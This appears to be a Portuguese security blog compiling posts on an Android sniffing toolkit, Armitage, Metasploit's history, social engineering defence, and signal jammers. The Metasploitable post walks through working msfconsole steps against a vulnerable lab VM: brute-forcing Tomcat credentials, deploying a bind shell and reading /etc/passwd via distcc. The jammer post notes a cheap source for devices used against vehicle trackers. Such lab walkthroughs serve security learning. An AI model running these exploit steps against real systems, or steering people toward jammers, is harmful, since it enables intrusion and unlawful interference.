DroidMap: Ferramenta de Segurança para Android

O Android está crescendo  rapidamente no mercado, ele já está em segundo lugar como sistema operacional utilizada por celulares, não é para menos, plataforma aberta e uma massa de desenvolvedores criando as suas próprias aplicações para ele.

Temos o caso dos desenvolvedores de segurança da informação criando verdadeiras aplicações e suítes de programas para o Android, é o caso do Droidmap que nada mais é que um mini-Debian, digamos assim, que roda uma boa quantidade de ferramentas capazes de sniffar redes a partir do seu celular.

Installation :

1 – Unzip  the .zip and .7z files and copy all the contents to /sdcard/debian/

2 – Run your preferred terminal emulator and run bash with su.

3 – Install debroid with – sh ./sdcard/debian/debian.sh

4 – Boot into debian with the following command – debroid and voila!

 

 

Rodando Ettercap:

1 – ifconfig eth0 promisc

2 – cd /root/tools/

3 – ./etrun

Para baixar o Droidmap é só clicar no seguinte link.

Fonte: Coruja de TI

Anúncios

Armitage: Cyber Attack Management for Metasploit

O Armitage é uma GUI (interface gráfica) para Metasploit, que torna todo o processo de exploração simplificado, ao alcance de até mesmo um usuário com pouco conhecimento em Hacking, basta dar alguns cliques e pronto, sistema explorado.

O Armitage esta disponível para downloads no repositório do BackTrack, e pode ser baixado e instalado através do comando “apt-get install armitage”. Lembrando que antes de instalar o armitage, pode ser necessário atualizar o repositório do backtrack, para isso dê o comando “apt-get update”. Créditos a Luiz Vieira do site viva o linux.

o Metasploit,  é o framework dedicado para testes de intrusão mais utilizado em todo mundo, porém necessita de conhecimentos no nível intermediário para o avançado, não possui uma console gráfica intuitiva que venha na instalação do próprio produto. Para ajudar a resolver este problema foi criado o Armitage, uma ferramenta de gerenciamento gráfico que é acoplado ao Metasploit, com ele é possível realizar de forma gráfica uma série de configurações e até mesmo ataques.

 

 

O Armitage funciona tanto para mundo Linux como para mundo Windows, é uma excelente ferramenta para aqueles que pretendem obter conhecimentos mais avançados de como utilizar o Mestasploit, o seu download pode ser feito via o seguinte Link. [blog coruja de TI]

Metasploitable: Máquina Virtual Vulnerável

O metasploitable e uma máquina virtual rodando Ubuntu Server 8.04 com diversos softwares em versões com vulnerabilidades conhecidas, tais como Tomcat, TikiWiki, dentre outros.

Segundo o blog think-security você pode usar o VMware Player para executá-lo, mas saiba que você não quer que seja exposto à Internet, para escolher com cuidado o tipo de rede que você vai usar na máquina virtual. É configurado no modo de disco não persistente, por isso, se você mexer em algo que você pode simplesmente redefini-lo, e aqui estão algumas das credenciais que você pode usar para acessá-lo:

msfadmin:msfadmin
user:user
service:service
postgres:postgres
klog:123456789

Aqui estão algumas das coisas que você pode fazer com ele em msfconsole:

Usando o “Tomcat Application Manager Login Utility”, você pode testar as credenciais contra uma aplicação Tomcat (assumindo que o componente de gerenciador é ativado):

msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
msf auxiliary(tomcat_mgr_login) > exploit


[*] 10.0.1.88:8180 – username Tentando: ‘tomcat’ com a senha: “role1 ‘
[-] Http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] Falha ao logar como ‘gato’
[*] 10.0.1.88:8180 – username Tentando: ‘tomcat’ com a senha: ‘root’
[-] Http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] Falha ao logar como ‘gato’
[*] 10.0.1.88:8180 – username Tentando: ‘tomcat’ com a senha: ‘tomcat’
[+] ‘Tomcat’ http://10.0.1.88:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] login bem-sucedido: ‘tomcat’
[*] 10.0.1.88:8180 – username Tentando: “ambos” com a senha: “admin”

Lá vai você – um válido: login (tomcat tomcat). – Agora que temos credenciais válidas, podemos tentar o Tomcat Manager Application Deployer (tomcat_mgr_deploy):

msf > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit

[*] Iniciado manipulador de vincular
[*] A tentativa de selecionar automaticamente um alvo …
[*] Automaticamente selecionado alvo “Linux X86”
[*] Upload de 1612 bytes como HJpy1H.war …
[*] Executora / HJpy1H/EpKaNLsCQUUjo.jsp …
[*] Undeploying HJpy1H …
[*] Envio de estágio (36 bytes) para metasploitable
[*] Uma sessão de shell de comando aberto (10.0.1.21:39497 -> 10.0.1.88:4444) em 2010/05/12 19:54:16 -0200

O módulo distcc_exec também é um bom aproveitar para brincar – neste caso, usando uma carga de comando “cat / etc / passwd ‘:

msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/generic
msf exploit(distcc_exec) > set RHOST metasploitable
msf exploit(distcc_exec) > set CMD 'cat /etc/passwd'
msf exploit(distcc_exec) > exploit
connecting...

[*] Stdout: root: x: root:: 0:0 / root: / bin / bash
[*] Stdout: daemon: x: daemon:: 01:01 / usr / sbin: / bin / sh

 

 

Portanto, não precisa esperar mais – basta baixar Metasploitable e começar a melhorar suas habilidades  no Metasploit!

Engenharia Social

Em tempos onde a informação se torna cada vez mais próxima tendo a internet como sua facilitadora, fraudes e golpes descobrem um novo horizonte de possibilidades. Os benefícios da internet no uso cotidiano são indiscutíveis trazendo praticidade às nossas tarefas do dia a dia. Com todo esse conforto gerado pela internet nos esquecemos que existem certo pontos negativos nesse contexto, dados pessoais são divulgados abertamente facilitando o acesso de pessoas mal intencionadas.

Segundo Guilherme Junior Engenharia social consiste em técnicas utilizadas por pessoas com o objetivo de obter acesso e informações importantes e/ou sigilosas em organizações ou sistemas por meio da ilusão ou exploração da confiança das pessoas.

É importante ressaltar que, independente do hardware, software e plataforma utilizada, o elemento de maior vulnerabilidade em qualquer sistema é o ser humano, por possuir traços comportamentais e psicológicos que o torna susceptível a ataques de engenharia social. Dentre essas características, podem-se destacar:

  • Vontade de ser útil: O ser humano, comumente, procura agir com cortesia, bem como ajudar outros quando necessário.
  • Busca por novas amizades: O ser humano costuma se agradar e sentir-se bem quando elogiado, ficando mais vulnerável e aberto a fornecer informações.
  • Propagação de responsabilidade: Trata-se da situação na qual o ser humano considera que ele não é o único responsável por um conjunto de atividades.
  • Persuasão: Compreende quase uma arte a capacidade de convencer pessoas, onde se busca obter respostas específicas. Isto é possível porque as pessoas têm características comportamentais que as tornam vulneráveis à manipulação.

Como se proteger da Engenharia Social

Bom senso

A vítima deve ficar sempre bem atenta ao receber qualquer tipo de abordagem, seja por telefone, e-mail, carta ou até mesmo pessoalmente, onde um pessoa (atacante) tenta o induzir a fornecer informações confidenciais pessoais e até mesmo sobre a empresa em que trabalha.

Informações sensíveis

Deve-se sempre estar antenado quando lhe for solicitado informações sensíveis como, por exemplo, números de cartões de crédito, senhas e etc. por pessoas estranhas. A vítima antes de tudo deve verificar a autenticidade da ligação que esta recebendo, do crachá que o atacante apresentou e etc.

Solicitações pela internet

Nunca fornecer informações pessoais, de empresas e etc antes de identificar e constatar a autenticidade do pedido. Por várias vezes, vítimas recebem e-mails contendo links falsos, informações não verdadeiras ou até mesmo solicitações de cadastro em empresas fantasmas. Para não cair nestas armadilhas a vítima deve, por exemplo, entrar em contato com a instituição que lhe fez a solicitação de cadastro, como por exemplo bancos, receita federal e etc, para garantir assim uma autenticidade do pedido, nunca clicar sobre links recebidos através de spams e etc.

Treinamento

Atualmente as empresas que querem evitar esse tipo de ataque, estão investindo alto em treinamento de funcionários, afim de evitar a vazão de informações sobre a estrutura da empresa.

O treinamento, estabelecimento da política de segurança da informação na empresa, baseia-se em educar os funcionários a sempre certificar-se de que a pessoa a quem vai fornecer as informações é realmente quem diz ser, a tomarem cuidado com o lixo pois este é uma grande fonte de informações, desconfiarem de pessoas em chats e etc.

Esta política de segurança da informação da empresa deve conter dentre outros tópicos, planos e ações de segurança como, por exemplo, plano de proteção física, continuidade dos negócios, análise de riscos, ações de engenharia, plano de contingência, plano de conscientização de todos os colaboradores, mesmo os terceirizados e etc.

Basicamente tudo se resume em reeducar toda a corporação a fim de implantar uma nova cultura cem por cento abrangente, cem por cento, pois qualquer falha põe novamente a corporação em risco iminente.

Metasploit Framework

metasploitHoje iremos falar sobre um poderoso framework, utilizado em testes de intrusão ou pentest’s seu nome é Metasploit, originalmente desenvolvido por H. D. Moore e o principal tema de meu trabalho de conclusão de curso, este post irá expor os beneficio de sua utilização em pentest’s.

O Metasploit é um framework de exploração de código aberto concebido para proporcionar ao usuário um modelo de desenvolvimento de exploits, possibilitando que longos trechos de código sejam reutilizados. Essa funcionalidade diminui o tempo gasto na implementação do código, o qual pode ser reaproveitado em experiências
futuras. Esse framework separa de maneira eficaz o código que explora falhas de software (conhecido como exploit), do código que é executado no sistema objeto com a finalidade de adquirir privilégios do usuário atual (payload), tornando possível a utilização de um payload em vários exploits.

Para aqueles que tiveram a oportunidade de assistir a palestra de H. D. Moore (Black Hat 2004), puderam presenciar algo somente visto em filmes de ficção tornar-se realidade. O título da palestra “Hacking Like in the Movies” referia-se a chegada de sua ferramenta, o Metasploit Framework (MSF) versão 2.2.0. As atenções se voltaram para dois telões que mostravam respectivamente o console do MSF e um sistema operacional Windows (a ser comprometido). O sistema foi comprometido com apenas alguns comandos estabelecendo assim uma conexão com privilégios administrativos entre o computador de H. D. Moore e o alvo, mas isso era apenas uma amostra do estava por vir.

A idéia original do Metasploit era criar um jogo que simulasse um ambiente virtual explorável ao qual se assemelhasse com a realidade, o projeto gradualmente se tornou um framework que visava o funcionamento, configuração e desenvolvimento de exploits para vulnerabilidades já conhecidas. A versão 2.1 do produto foi lançada em junho de 2004, desde então o desenvolvimento do produto e a adição de novos exploits e payloads tem aumentado rapidamente. Embora inicialmente a estrutura não fornecesse nenhum suporte a colaboradores, com o lançamento da versão 2.2 o framework se tornou muito mais amigável aos desenvolvedores. A versão 2.x originalmente escrita em Perl, Assembly e C, logo concedeu lugar a versão 3.x que foi completamente reescrita em Ruby, revisando a arquitetura, interface e as API’s fornecidas aos usuários.

Para maiores informações sobre o Metasploit baixe meu tcc clicando aqui.

Freak Hardware: Jammer

Você sabe oque é um jammer?

Olá pessoal, como forma de boas vindas ao blog irei iniciar uma série de matérias denominadas “freak hardware”, essas matérias tem como objetivo expor circuitos eletrônicos pouco ortodoxos, assim como seu funcionamento e exemplos de utilizaçao. Por ser um blog focado em tecnologia e segurança da informaçao nossa tendencia será expor hardware’ s capazes de capturar ou modificar dados relacionados a computação e quando possível exibir preços e e pontos de venda.

Neste primeiro post um aparelho bem peculiar será apresentado, trata-se de um aparelho capaz de interferir nas ondas de celulares, roteadores wifi e sistemas de geo posicionamento tornando seu uso ineficaz este equipamento chama-se jammer.

Como funciona um jammer?

Segundo o blog http://infogps.uol.com.br o modelo mais utilizado funciona criando um sinal (ruído) em banda larga – BBN (Booardband Noise Jamming) – em que o circuito interfere nas bandas de comunicação presentes na telefonia móvel nacional. O ‘jammer’ realiza uma interferência (perturbação) entre o veículo e a antena operadora – o que provoca a perda de comunicação com a rede de telefonia móvel.
No telefone celular, quando uma ação dessas ocorre, o display apresenta as seguintes mensagens: “fora de serviço”, “procurando rede”, ou algo similar que evidencie que o aparelho está sem comunicação.

Segundo os profissionais que atuam na localização de veículos roubados, os desmanches que recebem o produto de roubo já têm equipamentos de bloqueio de comunicação instalados em sua estrutura. E a criatividade dos criminosos não tem limites. Alguns já instalam o ‘jammer’ no porta-malas do veículo roubado, para que o equipamento seja confundido com um módulo de som, caso o carro passe por uma blitz da polícia.

As empresas fabricantes de equipamentos de rastreamento estão buscando desenvolver produtos imunes à ação do ‘jammer’. Entretanto, até o momento, todos os equipamentos testados pelo Cesvi Brasil, mais de 300 marcas, não conseguiram ser imunes ao jammer.

Um equipamento critico que esta sendo usado em roubos de carga para anular o sinal de equipamentos de gps pode também ser usado em telefones celulares e roteadores sem fio, do ponto de vista da segurança da informação estes aparelhos poderiam ser bem empregados em consultorias de segurança especificas, muitas empresas possuem serviços críticos sendo transmitidos por radiofrequência.

O mais interessantes é que esse tipo de aparelho é livremente comercializado em lojas da china como vistos no link abaixo:

www.dealextreme.com

O preço do produto é irrisório em vista do potencial impacto dessa ferramenta, o que nos leva a pensar quão frágil é a segurança de aparelhos que se utilizam de radiofrequência.